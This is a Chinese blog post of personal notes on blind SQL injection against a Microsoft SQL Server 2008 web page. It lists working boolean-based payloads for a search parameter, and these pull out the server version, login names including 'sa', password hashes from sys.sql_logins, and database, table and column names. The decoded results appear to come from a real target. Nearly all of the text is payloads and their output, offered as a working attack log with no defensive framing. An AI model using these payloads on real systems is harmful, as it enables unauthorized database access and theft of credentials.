注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

mssql 2008盲注笔记  

2015-03-14 16:58:47|  分类: SQL injection |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
mssql数据库
(select count(*) from sysobjects)>0

SELECT UNICODE(SUBSTRING((system_user),1,1))
Username = dzxl

master.dbo.fn_varbintohexstr(password_hash)  sys.sql_logins  name

mssql 2008

http://123.com/Result.aspx?cn=a%' and substring((select @@version),22,4)='2008'and '%'='

public权限:

1=(select IS_SRVROLEMEMBER('public'))

name:

http://123.com/Result.aspx

?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 name from sys.sql_logins)),1,1) ) >100 and '%'='

115 97 sa

http://123.com/Result.aspx

?cn=a%' and  ascii(substring((select top 1 name from sys.sql_logins where name not in ('sa')),1,1)) >100 and '%'='

100 122 120 108 dzxl

password

http://123.com/Result.aspx

?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins)),1,1) ) >100 and '%'='

http://123.com/Result.aspx

?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 password_hash from sys.sql_logins)),1,1) ) >100 and '%'='

数据库数目:
http://123.com/Result.aspx?cn=a%' and (select count(*) from master.dbo.sysdatabases)=10 and '%'='

从1到5都是系统的id,6以上才可以判断
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6)=1 and '%'='

datebase长度
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=12)=1 and '%'='

猜表名
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6 and ascii(substring(name,1,1))=82)=1 and '%'='

dbid=1 109 97 115 116 101 114 master
dbid=2 116 101 109 112 100 98 tempdb
dbid=3 109 111 100 101 108     model
dbid=4  109 115 100 98         modb
dbid=5   82 101 112 111 114 116 83 101 114 118 101 114 ReportServer
dbid=6   82 101 112 111 114 116 83 101 114 118 101 114 118 101 114 84 101 109 112 68 66 ReportSerververTempDB
dbid=7  100 122 108 120 120 98 95 106 111 117 114 110 97 108  dzlxxb_journal
dbid=8  100 122 108 120 120 98 95 119 101 98 115 105 116 101  dzlxxb_website
dbid=9  100 122 108 120 120 98 95 109 97 105 110  dzlxxb_main
dbid=10  68 90 76 88 95 68 66  DZLX_DB

http://123.com/Result.aspx

?cn=a%' and  (ascii(substring((select top 1 table_name from information_schema.tables),1,1))=84) and '%'='

第一个表名:

http://123.com/Result.aspx

?cn=a%' and (ascii(substring((select top 1 table_name from information_schema.tables where table_name not in ('T_BH_userLabel')),1,1))=84 ) and '%'='

84 95 66 72 95 117 115 101 114 76 97 98 101 108 T_BH_userLabel
列名:

http://123.com/Result.aspx

?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name='T_BH_userLabel' and column_name not in ('f_ulab_ID')),1,1)=84 ) and '%'='

102 95 117 108 97 98 95 73 68 f_ulab_ID

http://123.com/Result.aspx

?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where column_name not in ('f_ulab_ID')),1,1))=84 ) and '%'='

102 95 117 108 97 98 95 110 97 109 101 f_ulab_name

102 95 117 108 97 98 95 115 113 108 f_ulab_sql

102 95 117 108 97 98 95 99 111 110 116 101 110 116 f_ulab_content

102 95 117 108 97 98 95 105 110 110 101 114 67 111 110 116 101 110 116 f_ulab_innerContent

第二个表名

116 95 66 72 95 80 101 114 109 105 115 115 105 111 110 115 t_BH_Permissions

http://123.com/Result.aspx

?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name ='t_BH_Permissions'),1,1))=84 ) and '%'='

102 95 112 101 114 95 73 68 f_per_ID

http://123.com/Result.aspx

?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name ='t_BH_Permissions' and column_name not in ('f_per_ID')),1,1))=102 ) and '%'='

102 95 114 111 108 101 95 73 68 f_role_ID

102 95 112 97 115 115 112 111 114 116 95 73 68 f_passport_ID

102 95 99 104 97 110 110 101 108 95 73 68 f_channel_ID

第三个表名: 

116 95 66 72 95 104 111 116 87 111 114 100 t_BH_hotWord

第四个表名:

116 95 66 72 95 65 116 116 114 105 98 117 116 101 t_BH_Attribute

第五个表名:

115 121 115 100 105 97 103 114 97 109 115 sysdiagrams

第六个表名

116 95 66 72 95 97 99 99 101 115 115 111 114 105 101 115 t_BH_accessories

第七个表名
116 95 66 72 95 99 111 110 116 101 110 116 84 121 112 101 t_BH_contentType

http://123.com/Result.aspx

?cn=a%' and  unicode(substring(convert(varchar(254),(select count(*) from sysobjects where xtype='u')),1,1) ) =95 and '%'='

?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 name from sys.sql_logins)),1
  评论这张
 
阅读(41)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017